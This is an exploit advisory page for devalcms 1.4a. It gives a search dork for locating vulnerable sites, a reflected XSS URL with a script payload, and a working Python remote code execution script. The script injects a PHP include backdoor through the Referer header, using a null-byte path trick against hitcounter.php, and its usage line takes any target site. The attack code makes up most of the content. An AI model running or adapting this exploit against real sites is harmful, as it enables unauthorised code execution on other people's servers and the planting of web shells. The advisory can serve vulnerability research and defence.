devalcms 1.4a XSS / Remote Code Execution Exploit

2009-08-19 / 2009-08-20
Credit: R3d.W0rm
Risk: High
Local: No
Remote: Yes
CWE: CWE-79
CWE-94

#!/usr/bin/python ######################## #### devalcms v1.4a Remote Code Execution Exploit / Xss #### ######################## # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # ######################## # # #Download : http://www.sourceforge.net/projects/devalcms # # # #DORK : "powered by devalcms v1.4.a" # # # ##################################################################################### # [Xss] # # # #http://Site/[path]/index.php?currentpath=<script>alert('Xss')</script> # # # ######################## # # # [Remote Code Execution] # # # #Use this exploit for remote code execution valun . # # # ######################## # Site : Http://IRCRASH.COM # ##### TNX GOD ###### import sys,socket argv=sys.argv data='<?php include $_GET[\'evil\']; ?>' query='/modules/tool/hitcounter.php?gv_folder_data=./url2header.php%00' if len(argv) < 3 : print '[*]Devalcms v1.4.a Remote code execut exploit' print '[*]Dork : powered by devalcms v1.4.a' print '[*]Powered by : R3d.W0rm' print '[*]Our Site : http://ircrash.com' print '[*]Usage : ' + argv[0] + ' site /path' exit() if 'http://' in argv[1] : target=argv[1].replace('http://','') else : target=argv[1] if '/' in argv[2] : path=argv[2] else : path='/' + argv[2] print '[*]Devalcms v1.4.a Remote code execut exploit' print '[*]Powered by : R3d.W0rm' print '[*]Our Site : http://ircrash.com' sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target,80)) sock.send("GET " + path + query + " HTTP/1.1\n") sock.send("Host: " + target + "\n") sock.send("Referer: " + data + "\n\n\n") recv=sock.recv(2048) if 'HTTP/1.1 200 OK' in recv : print '[+]Code injected .' print '[+]Code inject in http://: ' + target + path + '/modules/tool/url2header.php' else : print '[-]Can not inject code.' exit()

References:

http://xforce.iss.net/xforce/xfdb/44942
http://www.securityfocus.com/bid/31037
http://osvdb.org/47972


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top